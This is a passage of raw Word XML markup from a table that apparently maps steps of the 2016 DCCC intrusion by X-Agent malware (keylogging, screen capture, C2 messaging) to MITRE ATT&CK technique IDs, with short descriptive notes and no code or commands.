          <w:p w14:paraId="5E8CD334" w14:textId="56EDA0D5" w:rsidR="00FA7A26" w:rsidRPr="00105B0A" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00B33B9D">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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8F5877" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00105B0A" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w14:paraId="7BA36D10" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6687631C" w14:textId="7978087E" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F210B8" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B786418" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A4D34B" w14:textId="2592B629" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="224AD7A3" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C3F5791" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150F16DE" w14:textId="54968C3C" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EECF72B" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:r>
              <w:t>[1] April 14, 2016, the Conspirators repeatedly activated</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D3397C" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:r>
              <w:t xml:space="preserve">X-Agent’s </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and screenshot functions to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>surveil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> DCCC Employee 1’s </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39513678" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>computer activity over the course of eight hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D2465" w:rsidRPr="00ED5880" w14:paraId="4BA008FD" w14:textId="77777777" w:rsidTr="007D132F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F5DCE3" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0727B999" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="004D2465" w:rsidP="007D132F">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A07E0DA" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B49BC80" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D141E9" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74DA3F17" w14:textId="7289CC0C" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="005F22F2" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B33F14" w14:textId="2E8EB62F" w:rsidR="004D2465" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E87C77F" w14:textId="77777777" w:rsidR="004D2465" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:r>
              <w:t xml:space="preserve">[1] The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> function allowed the Conspirators to capture keystrokes entered by DCCC employees</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FD15E5" w14:textId="77777777" w:rsidR="004D2465" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D3DEC52" w14:textId="77777777" w:rsidR="004D2465" w:rsidRPr="00B33B9D" w:rsidRDefault="004D2465" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Includes credential access at this point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w14:paraId="2AD7CC48" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479BE5FD" w14:textId="046B32CE" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004D2465">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D2F965" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B67368" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C761CD9" w14:textId="00276799" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005F22F2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3D6FEB" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FB8854" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A9BF07" w14:textId="33F0017E" w:rsidR="00FA7A26" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED64F64" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:r>
              <w:t xml:space="preserve">[1] The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> function allowed the Conspirators to capture keystrokes entered by DCCC employees</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A71486" w14:textId="77777777" w:rsidR="00B33B9D" w:rsidRDefault="00B33B9D" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10125872" w14:textId="47806C23" w:rsidR="00B33B9D" w:rsidRPr="00B33B9D" w:rsidRDefault="00B33B9D" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Includes credential access at this point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w14:paraId="25BCF62C" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51B98262" w14:textId="5B905C07" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004D2465">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54CBCBD5" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2957893D" w14:textId="08FFA8D5" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="008001A4" w:rsidP="008D2933">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1E38C15A" w14:textId="00EA346E" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005F22F2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="025E6B85" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4F8E47" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36122624" w14:textId="7C582651" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714E16A8" w14:textId="37DA01A4" w:rsidR="00FA7A26" w:rsidRPr="00105B0A" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00B33B9D">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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC8143B" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00105B0A" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004230DB" w:rsidRPr="00ED5880" w14:paraId="0F105DF4" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CF09FA" w14:textId="77777777" w:rsidR="004230DB" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FBEA0F8" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F3252B0" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="004230DB" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589B08DF" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB0322C" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58818FAF" w14:textId="77777777" w:rsidR="004230DB" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
